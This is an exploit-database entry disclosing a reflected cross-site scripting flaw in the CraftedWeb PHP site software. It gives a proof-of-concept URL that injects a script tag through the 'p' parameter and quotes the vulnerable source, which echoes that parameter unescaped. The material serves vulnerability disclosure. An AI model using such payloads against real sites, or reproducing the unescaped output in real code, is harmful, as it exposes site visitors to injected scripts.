CraftedWeb Cross Site Scripting

2015.10.12

Credit: M.r00t3x

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: CraftedWeb Cross Site Scripting
# Google Dork: NA
# Date: 2015-10-06
# Exploit Author: M.r00t3x
# Vendor Homepage: https://github.com/zze/CraftedWeb
# Software Link: https://codeload.github.com/zze/CraftedWeb/zip/master
# Tested on: Windows xp
reflected Xss
http://127.0.0.1/CraftedWeb-master/index.php?p=</title>1<ScRiPt>alert(&#039;xss&#039;)</ScRiPt>
source :
echo $website_title .&#039; - &#039;;
while ($page_title = current($GLOBALS[&#039;core_pages&#039;]))
{
if ($page_title == $_GET[&#039;p&#039;].&#039;.php&#039;)
{
echo key($GLOBALS[&#039;core_pages&#039;]);
$foundPT = true;
}
next($GLOBALS[&#039;core_pages&#039;]);
}
if(!isset($foundPT))
echo ucfirst($_GET[&#039;p&#039;]);
facebook page : wwww.fb.com/algeria.anon
Thanks : M.tucX - MrDz -MadGuko

References:

https://codeload.github.com/zze/CraftedWeb/zip/master

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CraftedWeb Cross Site Scripting

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.